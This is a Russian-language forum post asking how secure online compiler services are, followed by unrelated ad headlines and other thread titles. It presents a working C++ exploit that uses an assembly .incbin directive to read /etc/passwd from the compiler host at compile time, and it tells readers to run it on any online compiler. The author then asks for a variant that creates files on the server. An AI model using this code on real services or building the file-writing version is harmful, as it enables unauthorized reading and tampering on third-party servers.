Всем привет)
Может быть некоторые знают такие, например compileonline.com
Вообщем остается один вопрос, защищенность данных сервисов.
Впрочем, все в округ да около.
Есть данный эксплойт:
#include <stdio.h>
extern "C"
asm(
".global _data\n"
".data\n"
"_data:\n"
".incbin \"/etc/passwd\"\n"
".byte 0"
);
extern const char _data;
const char* data = &_data;
int main() {
printf("%s", data);
}
Тут во время компиляции вызывается ассемблерная функция incbin, которая в свою очередь на момент компиляции запускает либо читает сторонний файл, в данном эксплойте происходит чтение файла etc/passwd.
Для того, что бы эксплуатировать уязвимость, необходимо в любом онлайн компиляторе скомпилировать выше показанный код под языком C++
А теперь вопрос: вот хотелось бы узнать, есть ли эквивалент данной ассемблерной функции, только не читающий, а создающий определенные файлы?
Кофе для программистов: как напиток влияет на продуктивность кодеров?
Рекламные вывески: как привлечь внимание и увеличить продажи
Стратегії та тренди в SMM - Технології, що формують майбутнє сьогодні
Выделенный сервер, что это, для чего нужен и какие характеристики важны?
Современные решения для бизнеса: как облачные и виртуальные технологии меняют рынок
Всем привет, около месяца пишу на C++ и вот появилась мысль попробовать Qt, тем более он кроссплатформенный
При сериализации в boost::serialization можно записать вектор std::vector<int> base;
Например есть файл размером 1ГБ, как получить участок данных из него находящиеся где то посередине не читая его полностью